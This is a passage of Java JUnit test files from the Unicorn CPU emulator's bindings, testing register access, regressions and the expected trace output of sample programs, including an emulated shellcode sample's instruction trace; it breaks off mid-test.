Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); 
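        /* mem_map_ptr backs the guest page at 0xaaaaa000 with the direct ByteBuffer, so the guest store to 0xaaaaaaaa below is visible to the host via buffer.getInt(0xaaa) */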
u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_map_ptr(0xaaaaa000L, buffer, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE32_MEM_WRITE); u.reg_write(Unicorn.UC_X86_REG_ECX, 0x12345678); u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.length, 0, 0); assertEquals("buffer contents", 0x12345678, buffer.getInt(0xaaa)); } } unicorn-2.1.1/bindings/java/src/test/java/tests/RegTests.java000066400000000000000000000223101467524106700241560ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertArrayEquals; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertThrows; import java.math.BigInteger; import org.junit.Test; import unicorn.Arm64_CP; import unicorn.SyscallHook; import unicorn.Unicorn; import unicorn.UnicornException; import unicorn.X86_Float80; public class RegTests { @Test public void testX86ReadFloat80() { // fldl2e; fsin final byte[] X86_CODE = { -39, -22, -39, -2 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); X86_Float80 reg1 = (X86_Float80) u.reg_read(Unicorn.UC_X86_REG_ST0, null); X86_Float80 reg2 = (X86_Float80) u.reg_read(Unicorn.UC_X86_REG_FP7, null); assertEquals(Math.sin(Math.log(Math.E) / Math.log(2)), reg1.toDouble(), 1e-12); assertEquals(reg1.toDouble(), reg2.toDouble(), 1e-12); } @Test public void testX86WriteFloat80() { // fsin final byte[] X86_CODE = { -39, -2 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); X86_Float80 reg = X86_Float80.fromDouble(-1.1); u.reg_write(Unicorn.UC_X86_REG_ST0, reg); u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); reg = (X86_Float80) u.reg_read(Unicorn.UC_X86_REG_ST0, null); assertEquals(Math.sin(-1.1), reg.toDouble(), 1e-12); } /** Test batch register API. Ported from sample_batch_reg.c. Not a sample * because the Java version of this API is deprecated. 
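     * (Individual reg_read/reg_write calls are the supported replacement.)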
*/ @Test public void testBatchReg() { int[] syscall_abi = { Unicorn.UC_X86_REG_RAX, Unicorn.UC_X86_REG_RDI, Unicorn.UC_X86_REG_RSI, Unicorn.UC_X86_REG_RDX, Unicorn.UC_X86_REG_R10, Unicorn.UC_X86_REG_R8, Unicorn.UC_X86_REG_R9 }; Object[] vals = { 200L, 10L, 11L, 12L, 13L, 14L, 15L }; long BASE = 0x10000L; // mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov // r9, 6; syscall byte[] CODE = samples.Utils.hexToBytes("48c7c06400000048c7c70100000048c7c602" + "00000048c7c20300000049c7c20400000049" + "c7c00500000049c7c1060000000f05"); Unicorn uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_64); uc.reg_write_batch(syscall_abi, vals); Object[] rvals = uc.reg_read_batch(syscall_abi); assertArrayEquals(vals, rvals); uc.hook_add((SyscallHook) (u, user_data) -> { Object[] nvals = u.reg_read_batch(syscall_abi); assertArrayEquals(new Object[] { 100L, 1L, 2L, 3L, 4L, 5L, 6L }, nvals); }, Unicorn.UC_X86_INS_SYSCALL, 1, 0, null); uc.mem_map(BASE, 0x1000, Unicorn.UC_PROT_ALL); uc.mem_write(BASE, CODE); uc.emu_start(BASE, BASE + CODE.length, 0, 0); } @Test public void testBigIntegerRegister() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); int reg = Unicorn.UC_ARM64_REG_V0; assertThrows(UnicornException.class, () -> uc.reg_read(reg)); assertThrows(UnicornException.class, () -> uc.reg_write(reg, 1L)); assertThrows(ClassCastException.class, () -> uc.reg_write(reg, (Long) 1L)); BigInteger b127 = BigInteger.valueOf(2).pow(127); BigInteger bmax = BigInteger.valueOf(2).pow(128).subtract(BigInteger.ONE); uc.reg_write(reg, BigInteger.ZERO); assertEquals("write 0, get 0", BigInteger.ZERO, uc.reg_read(reg, null)); uc.reg_write(reg, BigInteger.ONE); assertEquals("write 1, get 1", BigInteger.ONE, uc.reg_read(reg, null)); assertEquals("get 1 from alias", BigInteger.ONE, uc.reg_read(Unicorn.UC_ARM64_REG_Q0, null)); uc.reg_write(reg, BigInteger.ONE.negate()); assertEquals("write -1, get 2^128 - 1", bmax, uc.reg_read(reg, null)); uc.reg_write(reg, b127); assertEquals("write 2^127, get 2^127", b127, uc.reg_read(reg, null)); uc.reg_write(reg, b127.negate()); assertEquals("write -2^127, get 2^127", b127, uc.reg_read(reg, null)); uc.reg_write(reg, bmax); assertEquals("write 2^128 - 1, get 2^128 - 1", bmax, uc.reg_read(reg, null)); assertThrows("reject 2^128", IllegalArgumentException.class, () -> uc.reg_write(reg, bmax.add(BigInteger.ONE))); assertEquals("reg unchanged", bmax, uc.reg_read(reg, null)); assertThrows("reject -2^127 - 1", IllegalArgumentException.class, () -> uc.reg_write(reg, b127.negate().subtract(BigInteger.ONE))); assertEquals("reg unchanged", bmax, uc.reg_read(reg, null)); byte[] b = new byte[0x80]; b[0x70] = -0x80; uc.reg_write(reg, new BigInteger(b)); assertEquals("write untrimmed value", b127, uc.reg_read(reg, null)); } @Test public void testArm64Vector() { // add v0.8h, v1.8h, v2.8h final byte[] ARM64_CODE = { 0x20, (byte) 0x84, 0x62, 0x4e }; long ADDRESS = 0x100000; Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); uc.mem_write(ADDRESS, ARM64_CODE); uc.reg_write(Unicorn.UC_ARM64_REG_V0, new BigInteger("0cc175b9c0f1b6a831c399e269772661", 16)); // MD5("a") uc.reg_write(Unicorn.UC_ARM64_REG_V1, new BigInteger("92eb5ffee6ae2fec3ad71c777531578f", 16)); // MD5("b") uc.reg_write(Unicorn.UC_ARM64_REG_V2, new BigInteger("-4a8a08f09d37b73795649038408b5f33", 16)); // -MD5("c") assertThrows("rejects overly large values", IllegalArgumentException.class, () -> 
uc.reg_write(Unicorn.UC_ARM64_REG_V2, new BigInteger("1111222233334444aaaabbbbccccdddde", 16))); assertEquals("v0 value", new BigInteger("0cc175b9c0f1b6a831c399e269772661", 16), uc.reg_read(Unicorn.UC_ARM64_REG_V0, null)); assertEquals("v1 value", new BigInteger("92eb5ffee6ae2fec3ad71c777531578f", 16), uc.reg_read(Unicorn.UC_ARM64_REG_V1, null)); assertEquals("v2 value", new BigInteger("b575f70f62c848c86a9b6fc7bf74a0cd", 16), uc.reg_read(Unicorn.UC_ARM64_REG_V2, null)); uc.emu_start(ADDRESS, ADDRESS + ARM64_CODE.length, 0, 0); assertEquals("v0.8h = v1.8h + v2.8h", new BigInteger("4860570d497678b4a5728c3e34a5f85c", 16), uc.reg_read(Unicorn.UC_ARM64_REG_V0, null)); } @Test public void testArm64EnablePAC() { // paciza x1 final byte[] ARM64_CODE = { (byte) 0xe1, 0x23, (byte) 0xc1, (byte) 0xda }; long ADDRESS = 0x100000; Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.ctl_set_cpu_model(Unicorn.UC_CPU_ARM64_MAX); uc.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); uc.mem_write(ADDRESS, ARM64_CODE); Arm64_CP sctlr_el3 = new Arm64_CP(1, 1, 3, 6, 0); sctlr_el3.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el3); // NS | RW | API sctlr_el3.val |= 1L | (1L << 10) | (1L << 17); uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el3); sctlr_el3.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el3); Arm64_CP sctlr_el1 = new Arm64_CP(1, 0, 3, 0, 0); sctlr_el1.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el1); // EnIA | EnIB sctlr_el1.val |= (1L << 31) | (1L << 30) | (1L << 27) | (1L << 13); uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el1); sctlr_el1.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, sctlr_el1); Arm64_CP hcr_el2 = new Arm64_CP(1, 1, 3, 4, 0); hcr_el2.val = (Long) uc.reg_read(Unicorn.UC_ARM64_REG_CP_REG, hcr_el2); // API hcr_el2.val |= (1L << 41); uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, hcr_el2); Arm64_CP apiakeylo_el1 = new Arm64_CP(2, 1, 3, 0, 0); apiakeylo_el1.val = 0x4141424243434444L; uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, apiakeylo_el1); Arm64_CP apiakeyhi_el1 = new Arm64_CP(2, 1, 3, 0, 1); apiakeyhi_el1.val = 0x1234abcd4444aaaaL; uc.reg_write(Unicorn.UC_ARM64_REG_CP_REG, apiakeyhi_el1); uc.reg_write(Unicorn.UC_ARM64_REG_X1, 0x0000bbbbccccddddL); uc.emu_start(ADDRESS, ADDRESS + ARM64_CODE.length, 0, 0); assertNotEquals("X1 should be signed", 0x0000bbbbccccddddL, uc.reg_read(Unicorn.UC_ARM64_REG_X1)); assertEquals("X1 low bits should be unchanged", 0x0000bbbbccccddddL, uc.reg_read(Unicorn.UC_ARM64_REG_X1) & 0xffffffffffffL); } } unicorn-2.1.1/bindings/java/src/test/java/tests/RegressionTests.java000066400000000000000000000051141467524106700255620ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import java.math.BigInteger; import org.junit.Ignore; import org.junit.Test; import unicorn.Unicorn; import unicorn.UnicornException; import unicorn.CodeHook; public class RegressionTests { /** Test for GH #1539: Unable to read ARM64 v or q register using java binding */ @Test public void testARM64VReg() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0x1); uc.reg_write(Unicorn.UC_ARM64_REG_V0, BigInteger.valueOf(0x1234)); uc.reg_read(Unicorn.UC_ARM64_REG_X0); assertEquals("V0 value", BigInteger.valueOf(0x1234), uc.reg_read(Unicorn.UC_ARM64_REG_V0, null)); // should not crash assertEquals("V0 low byte", 0x34, uc.reg_read(Unicorn.UC_ARM64_REG_B0)); assertEquals("V0 low halfword", 0x1234, 
uc.reg_read(Unicorn.UC_ARM64_REG_H0)); } /** Test for GH #1164: Java binding use CodeHook on Windows, will invoke callback before every instruction */ @Test public void testCodeHookRunsOnce() { byte[] ARM_CODE = { 55, 0, (byte) 0xa0, (byte) 0xe3, 3, 16, 66, (byte) 0xe0 }; // mov r0, #0x37; sub r1, r2, r3 int ADDRESS = 0x10000; final int[] hook_count = { 0 }; Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_ARM); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, ARM_CODE); u.hook_add((CodeHook) (uc, address, size, user) -> hook_count[0] += 1, ADDRESS, ADDRESS, null); u.emu_start(ADDRESS, ADDRESS + ARM_CODE.length, 0, 0); assertEquals("Hook should only be called once", 1, hook_count[0]); u.close(); } /** Test that close() can be called multiple times without crashing */ @Test public void testCloseIdempotent() { Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_ARM); u.close(); u.close(); } /** Test that Unicorn instances are properly garbage-collected */ @Ignore("This test is not deterministic") @Test public void testUnicornsWillGC() { final boolean[] close_called = { false }; new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_ARM) { @Override public void close() throws UnicornException { close_called[0] = true; super.close(); } }; System.gc(); System.runFinalization(); assertEquals("close() was called", true, close_called[0]); } } unicorn-2.1.1/bindings/java/src/test/java/tests/TestSamples.java000066400000000000000000001633531467524106700246750ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import static org.junit.Assume.assumeTrue; import java.io.ByteArrayOutputStream; import java.io.PrintStream; import org.junit.Before; import org.junit.Ignore; import org.junit.After; import org.junit.Test; import unicorn.Unicorn; import unicorn.UnicornConst; public class TestSamples implements UnicornConst { private final ByteArrayOutputStream outContent = new ByteArrayOutputStream(); private final PrintStream originalOut = System.out; @Before public void setUpStreams() { outContent.reset(); System.setOut(new PrintStream(outContent)); } @After public void restoreStreams() { System.setOut(originalOut); } @Test public void testArm() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_arm(); assertEquals( "Emulate ARM code\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> R0 = 0x1234\n" + ">>> R1 = 0x0\n", outContent.toString()); } @Test public void testArmThumb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_thumb(); assertEquals( "Emulate THUMB code\n" + ">>> Tracing basic block at 0x10000, block size = 0x2\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> SP = 0x1228\n", outContent.toString()); } @Test public void testArmEb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_armeb(); assertEquals( "Emulate ARM Big-Endian code\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. 
Below is the CPU context\n" + ">>> R0 = 0x37\n" + ">>> R1 = 0x3456\n", outContent.toString()); } @Test public void testArmThumbEb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_thumbeb(); assertEquals( "Emulate THUMB Big-Endian code\n" + ">>> Tracing basic block at 0x10000, block size = 0x2\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> SP = 0x1228\n", outContent.toString()); } @Test public void testArmThumbMrs() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_thumb_mrs(); assertEquals( "Emulate THUMB MRS instruction\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> PC = 0x10004\n", outContent.toString()); } @Test public void testArmThumbIte() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_thumb_ite(); assertEquals( "Emulate a THUMB ITE block as a whole or per instruction.\n" + "Running the entire binary.\n" + ">>> R2: 104\n" + ">>> R3: 1\n" + "\n" + "Running the binary one instruction at a time.\n" + ">>> R2: 104\n" + ">>> R3: 1\n" + "\n", outContent.toString()); } @Test public void testArmReadSctlr() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM)); samples.Sample_arm.test_read_sctlr(); assertEquals( "Read the SCTLR register.\n" + ">>> SCTLR = 0xc50078\n" + ">>> SCTLR.IE = 0\n" + ">>> SCTLR.B = 0\n", outContent.toString()); } @Test public void testArm64MemFetch() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64_mem_fetch(); assertEquals( ">>> Emulate ARM64 fetching stack data from high address 10000000000000\n" + ">>> x0(Exception Level)=1\n" + ">>> X1 = 0xc8c8c8c8c8c8c8c8\n", outContent.toString()); } @Test public void testArm64() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64(); assertEquals( "Emulate ARM64 code\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> As little endian, X15 should be 0x78:\n" + ">>> X15 = 0x78\n", outContent.toString()); } @Test public void testArm64Eb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64eb(); assertEquals( "Emulate ARM64 Big-Endian code\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> As big endian, X15 should be 0x78:\n" + ">>> X15 = 0x12\n", outContent.toString()); } @Test public void testArm64Sctlr() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64_sctlr(); assertEquals( "Read the SCTLR register.\n" + ">>> SCTLR_EL1 = 0xc50838\n" + ">>> SCTLR_EL2 = 0x0\n", outContent.toString()); } @Test public void testArm64HookMrs() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64_hook_mrs(); assertEquals( "Hook MRS instruction.\n" + ">>> Hook MSR instruction. 
Write 0x114514 to X2.\n" + ">>> X2 = 0x114514\n", outContent.toString()); } @Test public void testArm64Pac() { assumeTrue(Unicorn.arch_supported(UC_ARCH_ARM64)); samples.Sample_arm64.test_arm64_pac(); assertEquals( "Try ARM64 PAC\n" + "X1 = 0x1401aaaabbbbcccc\n" + "SUCCESS: PAC tag found.\n", outContent.toString()); } @Test public void testCtlRead() { samples.Sample_ctl.test_uc_ctl_read(); assertEquals( "Reading some properties by uc_ctl.\n" + ">>> mode = 4, arch = 4, timeout=0, pagesize=4096\n", outContent.toString()); } @Test public void testCtlExits() { samples.Sample_ctl.test_uc_ctl_exits(); assertEquals( "Using multiple exits by uc_ctl.\n" + ">>> Getting a new edge from 0x10004 to 0x10005.\n" + ">>> eax = 1 and ebx = 0 after the first emulation\n" + ">>> Getting a new edge from 0x10004 to 0x10007.\n" + ">>> eax = 1 and ebx = 1 after the second emulation\n", outContent.toString()); } @Test public void testM68k() { assumeTrue(Unicorn.arch_supported(UC_ARCH_M68K)); samples.Sample_m68k.test_m68k(); assertEquals( "Emulate M68K code\n" + ">>> Tracing basic block at 0x10000, block size = 0x2\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x0 >>> D0 = 0x0\n" + ">>> A1 = 0x0 >>> D1 = 0x0\n" + ">>> A2 = 0x0 >>> D2 = 0x0\n" + ">>> A3 = 0x0 >>> D3 = 0xffffffed\n" + ">>> A4 = 0x0 >>> D4 = 0x0\n" + ">>> A5 = 0x0 >>> D5 = 0x0\n" + ">>> A6 = 0x0 >>> D6 = 0x0\n" + ">>> A7 = 0x0 >>> D7 = 0x0\n" + ">>> PC = 0x10002\n" + ">>> SR = 0x0\n", outContent.toString()); } @Test public void testMipsEl() { assumeTrue(Unicorn.arch_supported(UC_ARCH_MIPS)); samples.Sample_mips.test_mips_el(); assertEquals( "Emulate MIPS code (little-endian)\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> R1 = 0x77df\n", outContent.toString()); } @Test public void testMipsEb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_MIPS)); samples.Sample_mips.test_mips_eb(); assertEquals( "Emulate MIPS code (big-endian)\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. 
Below is the CPU context\n" + ">>> R1 = 0x77df\n", outContent.toString()); } @Test public void testMmuCpuTlb() { samples.Sample_mmu.cpu_tlb(); assertEquals( "Emulate x86 amd64 code with mmu enabled and switch mappings\n" + "map code\n" + "map parent memory\n" + "map child memory\n" + "map tlb memory\n" + "set up the tlb\n" + "run the parent\n" + "save the context for the child\n" + "finish the parent\n" + "write at 0x1000: 0x3c\n" + "restore the context for the child\n" + "write at 0x2000: 0x2a\n" + "parent result == 60\n" + "child result == 42\n", outContent.toString()); } @Test public void testMmuVirtualTlb() { samples.Sample_mmu.virtual_tlb(); assertEquals( "Emulate x86 amd64 code with virtual mmu\n" + "map code\n" + "map parent memory\n" + "map child memory\n" + "run the parent\n" + "tlb lookup for address: 0x2000\n" + "save the context for the child\n" + "finish the parent\n" + "tlb lookup for address: 0x4000\n" + "write at 0x1000: 0x3c\n" + "restore the context for the child\n" + "tlb lookup for address: 0x2000\n" + "tlb lookup for address: 0x4000\n" + "write at 0x2000: 0x2a\n" + "parent result == 60\n" + "child result == 42\n", outContent.toString()); } @Test public void testPpc() { assumeTrue(Unicorn.arch_supported(UC_ARCH_PPC)); samples.Sample_ppc.test_ppc(); assertEquals( "Emulate PPC code\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> r26 = 0x79bd\n", outContent.toString()); } @Test public void testRiscvRecoverFromIllegal() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_recover_from_illegal(); assertEquals( "Emulate RISCV code: recover_from_illegal\n" + ">>> Allocating block at 0x1000 (0x1000), block size = 0x2 (0x1000)\n" + ">>> Tracing basic block at 0x1000, block size = 0x0\n" + "Expected Illegal Instruction error, got: " + "unicorn.UnicornException: Unhandled CPU exception (UC_ERR_EXCEPTION)\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x7890\n", outContent.toString()); } @Test public void testRiscv1() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv(); assertEquals( "Emulate RISCV code\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Tracing instruction at 0x10004, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x78b0\n", outContent.toString()); } @Test public void testRiscv2() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv2(); assertEquals( "Emulate RISCV code: split emulation\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x7890\n" + ">>> Tracing basic block at 0x10004, block size = 0x4\n" + ">>> Tracing instruction at 0x10004, instruction size = 0x4\n" + ">>> Emulation done. 
Below is the CPU context\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x78b0\n", outContent.toString()); } @Test public void testRiscv3() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv3(); assertEquals( "Emulate RISCV code: early stop\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + "stop emulation\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1234\n" + ">>> A1 = 0x7890\n", outContent.toString()); } @Test public void testRiscvStep() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv_step(); assertEquals( "Emulate RISCV code: step\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x7890\n" + ">>> Tracing basic block at 0x10004, block size = 0x4\n" + ">>> Tracing instruction at 0x10004, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> A0 = 0x1\n" + ">>> A1 = 0x78b0\n", outContent.toString()); } @Ignore("timeout test is currently broken") @Test public void testRiscvTimeout() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv_timeout(); assertEquals( "Emulate RISCV code: timeout\n" + ">>> Tracing basic block at 0x10000, block size = 0x0\n" + "Failed on uc_emu_start() with error returned: 21\n" + "Error after step: PC is: 0x10004, expected was 0x10004\n" + ">>> Tracing basic block at 0x10000, block size = 0x0\n" + "Failed on uc_emu_start() with error returned: 21\n" + "Error after step: PC is: 0x10004, expected was 0x10004\n" + ">>> Emulation done\n", outContent.toString()); } @Test public void testRiscvSd64() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv_sd64(); assertEquals( "Emulate RISCV code: sd64 instruction\n" + ">>> Tracing basic block at 0x10000, block size = 0x8\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done.\n", outContent.toString()); } @Test public void testRiscvFuncReturn() { assumeTrue(Unicorn.arch_supported(UC_ARCH_RISCV)); samples.Sample_riscv.test_riscv_func_return(); assertEquals( "Emulate RISCV code: return from func\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Tracing basic block at 0x10006, block size = 0x4\n" + "Good, PC == RA\n" + "========\n" + ">>> Tracing basic block at 0x10004, block size = 0x2\n" + ">>> Tracing instruction at 0x10004, instruction size = 0x2\n" + ">>> Tracing basic block at 0x10006, block size = 0x4\n" + "Good, PC == RA\n" + ">>> Emulation done.\n", outContent.toString()); } @Test public void testS390x() { assumeTrue(Unicorn.arch_supported(UC_ARCH_S390X)); samples.Sample_s390x.test_s390x(); assertEquals( "Emulate S390X code\n" + ">>> Tracing basic block at 0x10000, block size = 0x2\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Emulation done. 
Below is the CPU context\n" + ">>> R2 = 0x3 >>> R3 = 0x3\n", outContent.toString()); } @Test public void testShellcode() { samples.Shellcode.test_i386(); assertEquals( "Emulate i386 code\n" + "\n" + ">>> Start tracing this Linux code\n" + "Tracing instruction at 0x1000000, instruction size = 0x2\n" + "*** EIP = 1000000 ***: eb 1c \n" + "Tracing instruction at 0x100001e, instruction size = 0x5\n" + "*** EIP = 100001e ***: e8 df ff ff ff \n" + "Tracing instruction at 0x1000002, instruction size = 0x1\n" + "*** EIP = 1000002 ***: 5a \n" + "Tracing instruction at 0x1000003, instruction size = 0x2\n" + "*** EIP = 1000003 ***: 89 d6 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + 